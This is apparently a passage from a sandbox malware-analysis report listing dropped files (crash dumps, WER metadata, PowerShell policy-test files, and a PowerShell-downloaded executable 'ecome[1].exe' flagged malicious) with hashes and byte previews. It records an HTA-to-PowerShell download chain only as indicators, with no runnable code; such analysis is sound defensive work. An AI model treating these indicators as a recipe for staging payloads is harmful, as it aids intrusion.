                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF80.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:38 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):63886
                                                                            Entropy (8bit):2.24701587235138
                                                                            Encrypted:false
                                                                            SSDEEP:192:GSyuX6tlLXFklt64lIEXmO2gtguyWABxG2u9sF0BqDaklr+1XLY3hyCHW767fgws:xynlBkltHlIGhgu+x+9s2Bsa9m1giq
                                                                            MD5:2CF843492A3DFA9F194E0B8701BEA714
                                                                            SHA1:3BD62144C74D29ECA311402F360794F179A0F167
                                                                            SHA-256:F0CD2AF62EAE284E3EEEEE00DF209BBED3E606948C26F98CFDA1D893D7D555C5
                                                                            SHA-512:7E654D95A1CA25332C79EA64A332DDD13CEB656EEAD1F449CCB56BD9350DD4836EBB5FCF9CD8456ADAB18072198746BF520389A277CDAA3F49CBA7A96BC2F1E4
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFFE.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.7159589887659275
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBk6gsOdYUc0pB089bN5sf4avm:R6lXJg6gsUYNiNSf0
                                                                            MD5:7B270C00D39DA8FE9E6FC41AB3F0084C
                                                                            SHA1:1DE92C30DEB1CB95E8E019EA225E514D98EB486E
                                                                            SHA-256:751FD79B3BE453DBFB2C11C93ACF200925C851F6B4B0F8D0AA0942023B3C37F2
                                                                            SHA-512:25F47378628C0161870189C46FD1EB719ECA282B805B1FB04D7643EE65CB540AFBF937494916EFD0D32084BB768B4B38E62A6DB57F892295C1631913FD35A87E
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF04D.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.486243817466006
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYwYm8M4JKTJFU+q8v+Tuh0B9ned:uIjfrI7Cj67V4J9KF0B9ned
                                                                            MD5:44D03F87B407847D24E4D5317B487725
                                                                            SHA1:AA4660CE4DC6318451BB1D59C6C1B5978B6E18D0
                                                                            SHA-256:67670E074CBB3ECCC3570350569AC9774648A1A4CC885007035E8ADF7B259E2B
                                                                            SHA-512:D87F1D5D41C1692F35440B4CF1E3EFC17700A4430773A83FFB62F9AFCEF9FE9D407DEDCB98D53C9FAF12031DB1F6F2D8BE00A163676760DAD1208DFA0E2D9A07
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF925.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:41 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62520
                                                                            Entropy (8bit):2.236882610582372
                                                                            Encrypted:false
                                                                            SSDEEP:384:nynlBklt3Jhga5TsEIw2aIQa9mMhB1xm8:ylB+ZhgeTIw2oar
                                                                            MD5:374D3DA345BF195A76464875482C8225
                                                                            SHA1:D37455BA21416F19A93D8EF3D2BB2C05BE0C61DD
                                                                            SHA-256:D20CE5A1018637B7DA9B8604BEB8CF7BCFCED5ED8CC85E0E127919DC6D102857
                                                                            SHA-512:FBEA8CF0FEE90255DA7ACD678F794DBC48662F71B84CF1548636AF32389E86BA61D8C0A5E67D46A753B00760C03FC5D82170E0F8CCF844132D99E6D2EAB2AB4E
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...............0...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9A3.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.7160459087607443
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBx6ZsgdYUMaAjAbpBv89b75sfO9Jm:R6lXJ16ZsaYdaAjA07SfO6
                                                                            MD5:01E81DEE6F5984BFBD72E6FE850FF942
                                                                            SHA1:855ED7871C5659DBFE568490908E6DD0A1D46926
                                                                            SHA-256:CE7684B6C836C400E9F1424B8F7C97C6BDFCA8B49CE8C7BF2010C7918769F7FE
                                                                            SHA-512:628D21B87D85FD53CCF8D36E1FAB50207F1574511552D869902510D39E36FAE32599C9FAFA2F393E1A25A33BA6FD15C0E13F735B41A049401B772F7797624AC9
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9C3.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.4837244799132625
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYOYm8M4JKTBF9A+q8v+TGh0B9ned:uIjfrI7Cj67VOJmAKt0B9ned
                                                                            MD5:1C897B85C7A39A106C7A4639EE49CCEF
                                                                            SHA1:816FE4F87F58A24C07F6D3DA1CBF5021B0E5D1D9
                                                                            SHA-256:1F8A8C53C240476896B97DACF97CE5DD270E2BB8F374B9E009B819B2D8FC86C0
                                                                            SHA-512:1FF308712D657E7C21950D5EC5DF2F28C93AA5D1216CC256BFC918AEB8E87952E1F60308FF032B02B3C32DC6B67A762C9B8BA8281A26879E8D45300F8D9877D3
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA5.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:41 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):63984
                                                                            Entropy (8bit):2.248389977785375
                                                                            Encrypted:false
                                                                            SSDEEP:192:NfNyuX6tlLXFkltSsmO2gtgSEyWFihsSEPb9aBn2L2TqDaklr+1XLY3hyCHW76Vh:hNynlBkltRhgLJihsSEz2nBsa9mAuMk
                                                                            MD5:D71AE8AE6DFE7E288D122B3AB378F134
                                                                            SHA1:0E214B9595183967B607943EE9EEAB29D849670F
                                                                            SHA-256:3120EF16736CBC1D62257701E49EEB5D4D36A9DF3CD7FE101678580063DD8119
                                                                            SHA-512:0AA6EB44ED9637BC9AB626BDC24894152E751C7D26CDA5C7B30A92D1846B93287026536AE985A50F5A92AAFE9987ED37B9620599FF43B712A1F26C8EA40BF5B0
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...............H...........L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC23.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6428
                                                                            Entropy (8bit):3.71714077263772
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBi65swuYUc0pBa89b75sfxwJm:R6lXJm65s5YNw7SfxD
                                                                            MD5:68961B32E5A2C5D0DD1D39D85ABA8991
                                                                            SHA1:CAFBB537CEFDF181327CF9828256449D5031DC9B
                                                                            SHA-256:58B35BFE9F88172C3A712A867AC21BD1501F6789C697FB5B13512D69A231BEF7
                                                                            SHA-512:A89338B1CF1DBF231EA66615763B983B62D943E99A6648D89572A96CD76A48494E1B8F444AFAA47C69BB3A88AB8A35C2F4C4A053A3235F7153075447854F36F0
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC43.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.485386344974945
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYgYm8M4JKTJFNGr+q8v+Tuh0B9ned:uIjfrI7Cj67VgJtrKF0B9ned
                                                                            MD5:68D728DDE3D71F2F1AA7BB8BBC6F0EB1
                                                                            SHA1:705525F9342AD48D9EC1EEDC847E4D9492D634C8
                                                                            SHA-256:BC79290F5AB80A4392590927AFA48D72565A36E07E8F2F939B0D9D9E8C2F5BB1
                                                                            SHA-512:531D5481F0DFA37CF1980E19B928AF45C371596DB1C76E7BB192CA4FF09E4EFCB15CB2A4F581A9C5143BB09094BD205E3536B461037ACBF63FD3B06369B8068A
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE9.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:46 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62716
                                                                            Entropy (8bit):2.2381024419267477
                                                                            Encrypted:false
                                                                            SSDEEP:384:ksynlBkltZFhgc/W8smwiAna9m2FEuLm:ulB+jhgce8hwPnap
                                                                            MD5:524D5E7E6A0F44A5FA264C53ED0164E8
                                                                            SHA1:C91C47C59DB9758AB3A6CD353B1483BCDD424BE1
                                                                            SHA-256:322DA73289A0CFFCE8223C91A9DC96F68558CCCBB0C9C34DA805C04B95F02E56
                                                                            SHA-512:93601B7816A9225410BD9A008F89A83E6D1F37E8E2E0B5A0FE7D9EDCE1A80473D467B3C5EA8CF8268FF4F58577E0309AFCE7D968F06B5FC787A001773263804B
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........X...............L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):540672
                                                                            Entropy (8bit):6.60558566420824
                                                                            Encrypted:false
                                                                            SSDEEP:6144:1oO3gcLssxNY5nm9zzeuQMdKNuCsXVkm4MrVGFlujcbDxnrTtF0xyOOOtwFt4rmk:1oQYsM5nm9nR81sFkTXwjcBrAbOOteQ
                                                                            MD5:A2D03C5333BFECCA62720CD6EE3A4DC4
                                                                            SHA1:CE4C380F2748F375904C17B38D4F93E294FEF4F6
                                                                            SHA-256:EF8EC5181AB4CF85A5C4867089594F40900EAAFB514496905EB86314C460178E
                                                                            SHA-512:5C9DB8BB415DA332C0ADC24519AE0410A65ABA932DE15A682CE57EFBC61B8B7D7E5E3548164909A5DA5BC6966C351528626655FDBB7C21F3B4FD1974406AE04C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                            Joe Sandbox View:
                                                                            • Filename: crreatedbestthingswithgreatattitudeneedforthat.hta, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G...........................`............`.......................Rich...................PE..L...a..e............................R.............@.................................t..........................................(....p..h=..................................................P8.......8..@............................................text.............................. ..`.data...........d..................@....rsrc...h=...p...>..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1510207563435464
                                                                            Encrypted:false
                                                                            SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                            MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                            SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                            SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                            SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                            Malicious:false
                                                                            Preview:@...e.................................^..............@..........

                                                                            C:\Users\user\AppData\Local\Temp\RESC255.tmp

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 16 17:54:40 2024, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1328
                                                                            Entropy (8bit):3.9955395160787517
                                                                            Encrypted:false
                                                                            SSDEEP:24:HSe9E2+fkxuXDfHywKEbsmfII+ycuZhNyakS6PNnqSqd:gFzpKPmg1ulya32qSK
                                                                            MD5:F6F2916DE97B9C95DEF9932A973646E4
                                                                            SHA1:CA3A336FF3EAB5F6712D272001760113EE4F8A8C
                                                                            SHA-256:F4BDD53EBBAF434C0A5B79D252832BB026421F90E83BC621912DEB1C096B1301
                                                                            SHA-512:B718BC3BA8F82094A1D20360F3A21415B87E4E00A097D620315D0B6570086E1979ADF7379E236216B249C4129856D5DFBCA2ED1BBF98BE9364B4549904969472
                                                                            Malicious:false
                                                                            Preview:L...`i`g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP................s......~....&............4.......C:\Users\user\AppData\Local\Temp\RESC255.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.e.a.h.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4whwa4kr.ky4.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpn0qad1.ngf.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo40hlpz.c33.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzrwjch5.2xf.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

